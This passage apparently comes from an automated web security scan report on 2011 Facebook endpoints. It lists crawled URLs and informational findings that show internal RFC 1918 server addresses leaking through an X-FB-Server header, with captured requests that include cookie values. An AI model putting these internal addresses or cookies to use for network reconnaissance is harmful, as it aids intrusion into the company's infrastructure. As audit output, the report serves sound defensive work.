http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/common/scribe_endpoint.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/plugins/recommendations.php
http://www.facebook.com/widgets/recommendations.php
http://www.facebook.com/widgets/recommendations.php

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

19.1. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.234.47

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.234.47
X-Cnection: close
Date: Thu, 16 Jun 2011 17:51:05 GMT

/*1308246665,171371055*/

window._ip_w["check4"] = 0;

19.2. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.47.50

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.47.50
X-Cnection: close
Date: Thu, 16 Jun 2011 16:12:49 GMT

/*1308240769,171847474*/

window._ip_w["check4"] = 0;

19.3. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.15.41

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.15.41
X-Cnection: close
Date: Thu, 16 Jun 2011 18:48:05 GMT

/*1308250085,171314985*/

window._ip_w["check4"] = 0;

19.4. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.99.35

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.99.35
X-Cnection: close
Date: Thu, 16 Jun 2011 13:32:40 GMT

/*1308231160,171336483*/

window._ip_w["check4"] = 0;

19.5. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.72.55

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfdf1fc9ac%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f74f00e4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.72.55
X-Cnection: close
Date: Thu, 16 Jun 2011 12:56:32 GMT

/*1308228992,171329591*/

window._ip_w["check4"] = 0;

19.6. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.193.34

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.193.34
X-Cnection: close
Date: Thu, 16 Jun 2011 17:04:34 GMT

/*1308243874,171884834*/

window._ip_w["check4"] = 0;

19.7. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.92.47

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.92.47
X-Cnection: close
Date: Thu, 16 Jun 2011 17:56:15 GMT

/*1308246975,171334703*/

window._ip_w["check4"] = 0;

19.8. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.237.45

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3871537c4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b994818%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
